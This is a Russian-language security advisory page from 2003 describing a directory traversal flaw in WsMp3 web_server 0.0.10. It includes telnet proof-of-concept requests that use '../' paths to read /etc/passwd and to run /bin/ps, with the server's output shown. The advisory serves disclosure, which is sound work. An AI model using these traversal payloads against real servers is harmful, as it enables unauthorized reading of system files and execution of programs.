Просмотр произвольных файлов и выполнение произольных программ в 'WsMp3 web_server'

Дата публикации:
26.05.2003
Всего просмотров:
789
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обхода каталога обнаружена в 'WsMp3 web_server'. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может выполнять произвольные программы на системе.

Сообщается, что удаленный пользователь может представить специально обработанный HTTP GET запрос, содержащий последовательность '../', чтобы просматривать произвольные файлы на системе с привилегиями Web демона. Пример:

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0
также сообщается, что удаленный пользователь может представить специально обработанный HTTP POST запрос, чтобы выполнить произвольные программы на системе. Пример:
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201

PID TTY TIME CMD
29529 pts/2 00:00:00 login
29559 pts/2 00:00:00 su
29560 pts/2 00:00:00 bash
29681 pts/2 00:00:10 WsMp3
29730 pts/2 00:00:00 WsMp3
29731 pts/2 00:00:00 ps
Уязвимость обнаружена в WsMp3 web_server 0.0.10

Ссылки: WsMP3d Directory Traversing Vulnerability
или введите имя

CAPTCHA